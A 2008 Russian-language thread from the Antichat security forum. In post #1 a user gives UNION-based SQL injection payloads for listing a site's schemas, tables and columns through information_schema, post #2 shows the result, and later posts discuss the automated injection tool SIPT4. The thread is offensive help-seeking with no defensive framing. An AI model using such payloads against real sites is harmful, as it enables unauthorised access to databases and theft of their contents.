HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.12.2008, 19:29
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns

потом ....+from+dbname.table_name
 
Ответить с цитированием

  #2  
Старый 28.12.2008, 19:40
lmns
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме:
2954516

Репутация: 303


По умолчанию

Цитата:
Сообщение от aka PSIH  
посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns

потом ....+from+dbname.table_name
вывелось так

information_schema:TRIGGERS:CREATED
information_schema:TRIGGERS:SQL_MODE
information_schema:TRIGGERSEFINER
information_schema:USER_PRIVILEGES:GRANTEE
information_schema:USER_PRIVILEGES:TABLE_CATALOG
information_schema:USER_PRIVILEGES:PRIVILEGE_TYPE
information_schema:USER_PRIVILEGES:IS_GRANTABLE
 
Ответить с цитированием

  #3  
Старый 28.12.2008, 19:42
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

ну выводи теперь то что тебе нужно, в чем проблемма?
 
Ответить с цитированием

  #4  
Старый 28.12.2008, 19:44
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

У меня пара вопросов по программе SIPT4:
1.Почему в некоторых случаях программа может определить принтабельные поля в инъекции, в других нет? При том что инъекции все простые и одинаковые.
2.Что означает каждая из цифр в поле "принтабельные поля": {2},4,5. Я так понимаю, 4 и 5 - это номер поля, а что означает цифра в фигурных скобках? Но это точно не число принтабельных полей.

Был бы признателен еще если бы кто-нибудь дал линк на подробный мануал по проге (а лучше видео).
 
Ответить с цитированием

  #5  
Старый 28.12.2008, 20:17
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

в {} принтабельное поле из найденных (мог бы и сам догадаться)

офф. сайт проги - http://dbattack.com/

Любая авто-тулза работает только в так называемых ИДЕАЛЬНЫХ условиях sql-inj, поэтому предпочтительно всё делать ручками, по крайней мере на начальном этапе.
 
Ответить с цитированием

  #6  
Старый 28.12.2008, 20:32
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

да нет, по-моему... к примеру, есть {2},4,5 - так вот как раз 4 и 5 это принтабельные поля.. ну во всяком случае у меня всегда это были принтабельные поля.. хз, может совпадало так.
http://dbattack.com/ - уже черт знает сколько не работает.
 
Ответить с цитированием

  #7  
Старый 28.12.2008, 20:39
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Pashkela правильно сказал, просто ты его недопонял.

{2},4,5 - принтабельные, а конкретно через 2-ое поле, прога будет выводить.
 
Ответить с цитированием

  #8  
Старый 28.12.2008, 20:48
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

а, все, ясно спасибо ))
Еще один вопрос по этой проге: если я вручную ввожу принтабельные поля, то обязательно их ВСЕ писать? или достаточно, например, ондного - то, через которое все выводится?

Последний раз редактировалось Thrasher88; 28.12.2008 в 21:42..
 
Ответить с цитированием

  #9  
Старый 29.12.2008, 12:47
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Достаточно и одного, главное - заключить поле в скобки.
 
Ответить с цитированием

  #10  
Старый 29.12.2008, 20:12
Sonar_
Новичок
Регистрация: 19.12.2008
Сообщений: 7
Провел на форуме:
40974

Репутация: 0
По умолчанию

Как получить голоса на Vkontakte.ru не платив за них?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ